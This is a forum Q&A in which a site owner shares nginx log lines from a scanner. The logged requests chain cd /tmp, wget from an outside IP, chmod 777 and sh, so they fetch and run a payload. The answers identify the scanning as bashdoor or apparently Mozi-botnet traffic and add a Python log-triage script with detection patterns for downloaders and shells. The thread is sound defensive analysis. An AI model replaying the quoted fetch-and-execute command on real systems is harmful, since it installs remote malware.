I use WordPress on my site. Recently I blocked a hacker who infected my site with A LOT of backdoors (thousands of backdoors, literally). I spent one and a half months beating him. It wasn't my fault; the person who had my job before me never updated the site.
After this, I noticed some strange accesses to files that just don't exist, and I think the hacker is trying to find known exploits for WordPress plugins that I don't use. That is OK, I don't care at all. But one of those attempts caught my attention.
95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
94.200.107.2 - - [17/Jan/2020:13:52:28 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
197.226.122.184 - - [17/Jan/2020:14:57:36 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
I am hiding part of the URL, sorry.
The IPs always change, even between consecutive requests less than one second apart, maybe a DDoS. The user agent commonly changes too; there is everything here: iPhone, iPad, Android, Windows 7, 8, 10, Firefox, Google Chrome, Internet Explorer... except Linux and Mac. Those 3 requests are the only exception.
I noticed that there are some shell commands in the URL. These ones:
cd /tmp;
rm -rf .j;
wget http://91.92.66.124/..j/.j;
chmod 777 .j;
sh .j;
echo DONE HTTP/1.1
There is no folder or file with this name in my /tmp directory.
This "karin" URL was an old site that hasn't existed for a long time. I don't know how he knows this URL; even I didn't know it. Every time I try to access some URL that is configured in NGINX but whose path doesn't exist, like this karin one, I get a 404 error. But those attempts got a 400 error.
404 is normal; it's because there is nothing there. But 400? It means that there is something there, but it couldn't process the data sent. I removed the nginx configuration for this URL, and I tried it on other URLs. I always got a 404 error. I tried this:
***.***.***.*** - - [17/Jan/2020:15:29:20 -0300] "joa***com.br" "GET /shell?cd+/var/www/html/conf;mkdir+teste HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" "-"
So my question is: Should I be scared of these commands returning a 400 error on this URL? Why can't I reproduce this? Apparently those attempts failed, but can I be sure they failed? Which type of attack is this? I have never heard of a "shell script injection by URL" like this.
It is an automatic scan made by scripts looking for web servers with bashdoor vulnerabilities.
You can, as a precaution, block all URLs that contain words like "shell". This type of scan is common, and a web server firewall can easily handle attack prevention.
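The answer above suggests filtering on the word "shell" in the URL. As an added example (editor's code, not part of the question or either answer), the script below runs that rule plus a stricter one over nginx access-log lines: it undoes nginx's `\xHH` log escaping (the `\x5C` in the question is a literal backslash), URL-decodes the query string, splits it into the individual shell commands the asker listed by hand, and flags the request when it both fetches a file (`wget`/`curl`/`tftp`) and hands something to an interpreter (`sh`/`bash`). It also pulls out the download host as an indicator to block or hunt for in outbound traffic. The first two input lines are copied from the question (with the masking the asker applied); the third line and the indicator names and regexes are my own constructions, not anything from the post.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Input: lines 1-2 are the scanner hit and the asker's own test from the question
# (host and IP masked as in the post); line 3 is a constructed benign request.
SAMPLE_LOG = r'''
95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
***.***.***.*** - - [17/Jan/2020:15:29:20 -0300] "joa***com.br" "GET /shell?cd+/var/www/html/conf;mkdir+teste HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" "-"
203.0.113.7 - - [17/Jan/2020:15:40:02 -0300] "karin***com.br" "GET /index.php?p=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "-"
'''

# Log format used on the page: ip - - [time] "host" "request" status bytes "referer" "ua" "xff"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<host>[^"]*)" '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Shell command separators that scanners chain inside one query string.
SEPARATOR = re.compile(r'\s*(?:;|&&|\|\|?|\n)\s*')

# Heuristic indicators (names and patterns are this example's own choice).
INDICATORS = {
    'staging_dir': re.compile(r'^cd\s+(/tmp|/var/tmp|/dev/shm)\b'),
    'downloader':  re.compile(r'^(wget|curl|tftp|ftpget)\b'),
    'make_exec':   re.compile(r'^chmod\s+(\+x|[0-7]*7[0-7]*)\b'),
    'interpreter': re.compile(r'^(sh|bash|busybox\s+sh)\s'),
    'wipe':        re.compile(r'^rm\s+-rf\b'),
}

# Host part of a download URL; tolerates the "http:/\/" form seen in the question.
DROP_URL = re.compile(r'(?:https?|tftp|ftp):[\\/]+([^\\/\s]+)')


def unescape_nginx(field):
    """nginx logs bytes it considers unsafe as \\xHH; turn them back into characters."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), field)


def shell_commands(target):
    """Decode the query string of a request target and split it into shell commands."""
    decoded = unquote_plus(urlsplit(unescape_nginx(target)).query)  # '+' -> ' ', %XX -> char
    return [c for c in SEPARATOR.split(decoded) if c]


def analyze(line):
    """Parse one access-log line; return a dict of findings, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m['target']
    path = urlsplit(unescape_nginx(target)).path
    cmds = shell_commands(target)
    hits = {name for c in cmds for name, rx in INDICATORS.items() if rx.search(c)}
    drop_hosts = sorted({h.group(1) for c in cmds for h in DROP_URL.finditer(c)})
    # Rule 1 (from the answer above): the path mentions "shell".
    # Rule 2 (stricter): the query fetches a payload and feeds something to an interpreter.
    suspicious = 'shell' in path.lower() or {'downloader', 'interpreter'} <= hits
    return {
        'ip': m['ip'], 'status': int(m['status']), 'path': path,
        'commands': cmds, 'indicators': sorted(hits),
        'drop_hosts': drop_hosts, 'suspicious': suspicious,
    }


def triage(log_text):
    """Analyze every non-empty line of a log excerpt, skipping lines that do not parse."""
    results = (analyze(l) for l in log_text.splitlines() if l.strip())
    return [r for r in results if r is not None]


if __name__ == '__main__':
    for r in triage(SAMPLE_LOG):
        flag = 'SUSPICIOUS' if r['suspicious'] else 'ok'
        print(f"{r['ip']:>16} {r['status']} {flag:<10} {r['path']} "
              f"indicators={r['indicators']} drop_hosts={r['drop_hosts']}")
```

The status code is not in the verdict on purpose: a 400 or 404 only tells you how the web server answered, not whether anything was executed. What does answer that question is checking the host itself for the artefacts the command chain would leave (a `.j` file under `/tmp`, an unexpected `sh` process, outbound connections to the extracted drop host), which is why the script surfaces the commands and the download host rather than just a yes/no.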
This looks like a request from the Mozi Botnet, a botnet that searches for backdoor shells on IoT devices.